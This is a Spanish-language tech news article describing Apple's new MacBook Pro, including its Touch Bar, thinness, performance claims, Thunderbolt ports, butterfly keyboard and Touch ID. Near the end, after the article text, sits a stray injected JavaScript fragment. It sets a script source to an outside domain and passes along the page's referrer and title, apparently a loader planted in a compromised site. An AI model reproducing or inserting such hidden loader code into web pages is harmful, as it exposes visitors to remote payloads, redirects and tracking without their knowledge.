Las nuevas MacBook están espectaculares

La nueva computadora de Apple es la más delgada y ligera en su tipo.

Este evento de Apple @Apple nos trajo menos sorpresas que en la presentación del iPhone 7. Sin embargo, no podíamos dejar de estar atentos a las novedades que nos traerían. Y como era de esperarse las MacBook Pro fueron la sensación. No sólo nos dejamos cautivar por su Touch Bar, la barra interactiva que está en la parte superior del teclado y que viene a sustituir a las teclas de función. Sus 14,9 mm de espesor y sus 3 libras la hacen la más ligera y delgada del mundo.

Estas nuevas MacBook ofrecen un rendimiento significativamente más rápido que el modelo anterior. Es 60% mejor para jugar, 130% más efectiva para trabajar con gráficos 3D y 50% más eficaz para editar video.

El modelo de 13 pulgadas cuenta con un doble procesador i5 e i7 y una GPU Intel Iris que es dos veces más rápida que su antecesora.

En cuanto a los puertos, tanto el modelo de 13 y el de 15 pulgadas vienen con cuatro puertos Thunderbolt para USB, VGA, DisplayPort y dispositivos HDMI. El modelo de 15 pulgadas es capaz de reproducir dos pantallas 5K al mismo tiempo.

El teclado cuenta con interruptores de 2da generación de mariposa para una mejor respuesta y mayor estabilidad mientras se escribe; el trackpad  es dos veces más grande en el modelo de 15 pulgadas.

La Touch Bar ofrece botones contextuales y controles para ayudar a ajustar las configuraciones y las aplicaciones. Por ejemplo, ofrece una herramienta para ayudar a enderezar fotos en un programa de edición de imágenes, al momento de escribir te sugiere palabras (como un smartphone) o te permite organizar las carpetas de tus correos.

La buena noticia es que si estabas preocupado por las teclas de función, éstas aparecerán cuando las necesites sobre la Touch Bar. Además, en la misma barra se ubica el Touch ID garantizando la seguridad.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios